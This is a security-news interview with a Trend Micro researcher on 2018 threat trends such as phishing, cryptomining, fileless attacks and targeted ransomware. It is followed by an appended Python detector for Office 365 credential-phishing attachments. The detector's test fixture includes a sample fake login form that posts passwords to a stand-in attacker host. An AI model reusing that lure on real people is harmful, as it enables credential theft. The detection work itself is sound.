By Bruce Sussman
Fri | Apr 12, 2019 | 6:40 AM PDT

Which types of cybercrimes are surging?

How are some cyber attacks becoming more targeted?

And which vulnerabilities are difficult or impossible to fully patch and require a workaround?

We were eager to get answers to these questions in our ongoing SecureWorld Behind the Scenes interview series.

Listen in as Jon Clay of Trend Micro uncovers the findings of new research in the company’s recently released 2018 Annual Security Roundup, "Caught in the Net: Unraveling the Tangle of Old and New Threats."

Play the complete conversation with Jon, or read excerpts below.

[SecureWorld] Jon, I think what our listeners want to know most is which type of attack vectors surged in 2018? What did your research discover?

[Jon Clay] What we saw was messaging attacks, socially engineered attacks, where the threat actors have shifted their tactics and are starting to look at things and ask, ‘how can I improve my infection rates?’ Socially engineered attacks against employees work, and they work pretty well. So they really have moved towards that type of attack vector, especially using the messaging layer.

They're also looking at credential-stealing attacks on email-based accounts, so we saw a huge increase in Office 365 attacks and credential phishing attacks. The attachment ultimately would pop an Office 365 login screen, the employees would then log in, thinking it was their corporate login account, and the criminals would be able to steal that person’s login credentials.

The second attack we saw increase was cryptocurrency mining. That definitely surged in 2018, and it was one of the biggest increases we saw.

And then the last one utilized by attackers has been the fileless attacks, script-based attacks. These are threats that don’t have a file associated with them, and it is a little more difficult for security folks to identify because there is no file, right? It’s in memory, it’s running in the processes of the system, and it’s a little more difficult to detect. We started to see a big increase in the use of this type of attack in 2018, as well.

[SW] One of the other things I know Trend Micro has focused on a lot is research around IoT and IIoT. What does the attack space look like there, based on what you uncovered?

[Clay] It’s an area we have a lot of concern about, and we just published a report on threats against Industry 4.0, which is primarily the IIoT space. The threat to these industrial IoT organizations and smart factories, probably the biggest one, is outdated software. As such, they are going to have vulnerabilities associated with them which may not even be patchable because they’re unsupported operating systems. XP is unsupported by Microsoft now. So any vulnerability introduced today that works in the XP operating system is not going to be fully patched.

Secondarily, with IoT and IIoT, the devices themselves, especially in industrial IoT, are old. They may have been produced 10 years ago and again, you’re going to introduce vulnerabilities across those periods of time that may not be patched—may not ever be patched. I call those vulnerabilities "forever days" instead of "zero days."

The biggest threat, in our opinion, in this space is outdated operating systems, outdated applications running on these devices, and outdated firmware. Organizations need to understand that these systems have to have some sort of patching; that’s where virtual patching, IPS, network-based IPS, can help them and potentially block exploits targeting those devices.

[SW] One of the other things I came across in the report… you had this incredible statistic on the millions of threats blocked in 2018? What was that number, and how are you able to measure so many threats?

[Clay] It was 48 billion threats that we blocked that were targeting our customer base last year, in 2018. The majority of that were messaging-based threats: spam, phishing, spear phishing attacks that we saw. A lot were tied to web-based attacks, and for your viewers listening to this, probably the best place to block an attack today, if you want to preempt an attack on your endpoints or employees, is to look at your messaging layer, look at your web layer, and provide protection at those layers. So your improved messaging and web security will block a majority of the threats coming into your organization.

The other one, though, is that files have continued to increase. File-based threats are still increasing, year over year.

[SW] What about ransomware? Last year it was conventional wisdom that ransomware was on the decline. What did your research find?

[Clay] Ransomware attacks against our customers were down, and the number of ransomware families identified was also down year over year. They are going much more targeted in their approach to ransomware, looking at organizations that have critical business systems that they can attack. Organizations where, if any of their systems get encrypted and are brought down for any period of time, it’s going to cause pain. Which also allows them to increase their ransom demands, because if I have critical systems that are taken offline due to ransomware, the likelihood I will pay the ransom to get them back online quickly is much higher.

It’s going to continue to drop in 2019, but it will continue to become more targeted. One of the reasons we’ve seen a decrease in ransomware is the improved protection and detection capabilities in the security industry. The use of machine learning and artificial intelligence has improved our ability to detect new ransomware families as they come out, without even having to do updates. That has improved our ability to detect ransomware, which means the threat actors behind it are seeing less ability to infect organizations.

[SW] The last thing I wanted to ask you about. What do all of these things tell us about the approach organizations should consider to protect themselves as we go through 2019?

[Clay] The multi-layered security structure is still the way to go about it. Make sure you have protection for your cloud-based assets, have protection at your gateway, your email messaging layer, your web layer... make sure you have network-based security in place, looking at network IPS, looking at network traffic scanning. Make sure your endpoints, including your servers, are covered. And at each of those layers, you want to have multiple technologies in play to be able to detect. That full breadth of detection is going to be key.

And the other thing you need to do as an organization is to make sure you have the ability and the process in place in case there’s a successful attack against you. You need to be able to recover as quickly as possible.

Our interview only covered the highlights, so you may want to read Trend Micro’s full report for yourself. Here is the 2018 Annual Security Roundup, "Caught in the Net: Unraveling the Tangle of Old and New Threats."

It gives context to the scope and type of threats organizations are facing this year.
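The credential-phishing pattern Jon describes above, where an email attachment pops an Office 365 login screen and posts whatever the employee types to the attacker, is the kind of thing a messaging-layer control can catch before the user ever sees it. The following is an added example (written for this page, not Trend Micro's or SecureWorld's code) of one such check: it assumes the lure is an HTML attachment, parses any form it contains, and flags a password-collecting form that carries Microsoft branding but posts to a host outside an assumed allowlist of legitimate Microsoft sign-in hosts. The sample attachments, the `TRUSTED_LOGIN_HOSTS` set and the `BRAND_KEYWORDS` list are all constructed assumptions for the example.

```python
"""Flag HTML email attachments that mimic an Office 365 sign-in page.

Added example, not code from the original article. Assumptions:
- the lure arrives as an HTML attachment containing a <form>,
- TRUSTED_LOGIN_HOSTS lists where genuine Microsoft sign-ins post,
- BRAND_KEYWORDS are strings a lure copies from the real page.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed allowlist; a federated tenant would add its own IdP host here.
TRUSTED_LOGIN_HOSTS = {
    "login.microsoftonline.com",
    "login.live.com",
    "login.windows.net",
}

# Assumed branding strings, compared case-insensitively against page text.
BRAND_KEYWORDS = ("office 365", "microsoft", "outlook", "sign in")


class _FormCollector(HTMLParser):
    """Collect every <form> with its action URL and whether it asks for a password."""

    def __init__(self):
        super().__init__()
        self.forms = []        # one dict per <form>: {"action": str, "has_password": bool}
        self.text = []         # visible text, used for the branding check
        self._current = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": attrs.get("action", ""), "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if attrs.get("type", "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

    def handle_data(self, data):
        self.text.append(data)


def analyze_attachment(html: str) -> dict:
    """Return a verdict for one HTML attachment.

    clean               : no form collects a password
    suspicious          : a password form exists but either lacks branding
                          or posts to a trusted sign-in host
    credential_phishing : branded page whose password form posts to an
                          untrusted host (or to no host at all)
    """
    parser = _FormCollector()
    parser.feed(html)
    parser.close()

    body_text = " ".join(parser.text).lower()
    branded = any(keyword in body_text for keyword in BRAND_KEYWORDS)

    password_forms = [f for f in parser.forms if f["has_password"]]
    # urlsplit lower-cases the hostname; a relative or javascript: action
    # yields None, which we treat as "" and therefore untrusted.
    untrusted_targets = [
        (urlsplit(f["action"]).hostname or "")
        for f in password_forms
        if (urlsplit(f["action"]).hostname or "") not in TRUSTED_LOGIN_HOSTS
    ]

    if not password_forms:
        verdict = "clean"
    elif branded and untrusted_targets:
        verdict = "credential_phishing"
    else:
        verdict = "suspicious"

    return {
        "verdict": verdict,
        "branded": branded,
        "password_forms": len(password_forms),
        "untrusted_targets": untrusted_targets,
    }


# Constructed sample attachments (not real lures). The .example TLD is reserved.
LURE_HTML = """<html><body>
<h1>Microsoft Office 365</h1>
<p>Your mailbox is almost full. Sign in to keep receiving mail.</p>
<form method="post" action="https://secure-mail-verify.example/collect.php">
  <input type="email" name="username">
  <input type="password" name="password">
  <button type="submit">Sign in</button>
</form></body></html>"""

BENIGN_HTML = """<html><body>
<h1>Invoice 2018-11</h1><p>Thank you for your order. Amount due: 120.00 EUR.</p>
</body></html>"""

if __name__ == "__main__":
    for label, sample in (("lure", LURE_HTML), ("benign", BENIGN_HTML)):
        print(label, analyze_attachment(sample))
```

The check is deliberately narrow: it only fires on a page that both looks like Microsoft and sends the password somewhere Microsoft does not own, which keeps it quiet on ordinary HTML attachments. A production gateway would also render the attachment to catch forms built by script, and would treat any password form inside an email attachment as worth quarantining regardless of where it posts.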